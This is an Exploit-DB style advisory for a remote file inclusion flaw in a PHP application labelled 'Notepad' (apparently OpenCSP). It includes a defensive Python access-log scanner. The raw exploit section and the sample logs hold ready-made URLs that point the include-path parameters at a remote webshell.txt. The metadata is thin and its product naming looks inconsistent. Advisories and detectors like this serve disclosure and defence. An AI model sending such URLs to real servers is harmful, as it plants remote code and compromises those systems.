Vendor: Notepad
By: Engel Pemula
CVSS: 8.8 (HIGH)
Vulnerability Type: Remote File Inclusion (RFI)
CWE: 98
Product Name: Notepad
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Notepad Remote File Inclusion Vulnerability

Notepad is vulnerable to Remote File Inclusion (RFI), which allows an attacker to include a remote file containing arbitrary code, resulting in arbitrary code execution on the vulnerable server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'GLOBALS[OCSP][DEFAULTCONFPATH]' and 'GLOBALS[PROJECT][PHPINCPATH]' parameters in the 'newClient.php', 'index.php', 'calendar.php' and 'forms/calendar.php' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the vulnerable parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.
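
A defender-side check for the requests this advisory describes, as an added example (not part of the original advisory or the Exploit-DB entry): it scans web-server access-log lines for the two named GLOBALS parameters on the named scripts and flags values that start with a URL scheme, including percent-encoded forms. The function name, the Combined Log Format assumption and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names and parameter names come from the advisory text.
SCRIPTS = {"newClient.php", "index.php", "calendar.php"}  # covers forms/calendar.php
PARAMS = {"GLOBALS[OCSP][DEFAULTCONFPATH]", "GLOBALS[PROJECT][PHPINCPATH]"}
# A value that starts with "scheme://" or "//host" points the include at a remote source.
REMOTE = re.compile(r"\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# Request line as it appears in Common/Combined Log Format (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def find_rfi_attempts(lines):
    """Return (line_no, script, param, value) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        if script not in SCRIPTS:
            continue
        # parse_qsl percent-decodes names and values, so %5B...%5D and
        # %3A%2F%2F encodings are matched the same way as the literal form.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in PARAMS and REMOTE.match(value):
                hits.append((no, script, name, value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /htsystem/system/calendar.php'
    '?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt? HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2020:10:00:02 +0000] "GET /htsystem/admin/client/newClient.php'
    '?GLOBALS%5BOCSP%5D%5BDEFAULTCONFPATH%5D=http%3A%2F%2Fexample.com%2Fwebshell.txt%3F'
    ' HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Jan/2020:10:01:00 +0000] "GET /htsystem/system/calendar.php'
    '?month=3 HTTP/1.1" 200 2301',
    '198.51.100.7 - - [01/Jan/2020:10:01:05 +0000] "GET /htsystem/admin/modules/galerie/'
    'index.php?page=http://example.com/ HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Any hit is worth triage whether or not the patch is applied, because a legitimate client has no reason to supply a `GLOBALS[...]` value in the query string.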

Exploit-DB raw data:

                                    
[@]================================================================================================================================================[@]
						 
[+] Location    	 : notepad						 
[+] Site           	 : www[dot]manadocoding[dot]net
[+] Contact        	 : engelpemula[at]gmail[dot]com							 
[+] Download Script	 : http://sourceforge.net/projects/opencsp/					 	
[@]================================================================================================================================================[@]



[@]================================================================================================================================================[@]
[+] 3xpl0it		 : http://server/htsystem/admin/client/newClient.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/admin/modules/galerie/index.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/forms/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[@]================================================================================================================================================[@]


[@]================================================================================================================================================[@]
[+] Greetz t00		 : All crew ManadoCoding [manadocoding.net]                                              
[+]                                                                                             	
[+]                        All Crew SekuritiOnline [sekuritionline.net]					
[@]================================================================================================================================================[@]


[@]================================================================================================================================================[@]
[+] Note		 : Anxiety in a man's heart weighs it down, but an encouraging word makes it glad (Proverbs 12:25)                                                                       
[@]================================================================================================================================================[@]

                                                        Thanks God for this day

			 	                           * GOD BLESS ALL *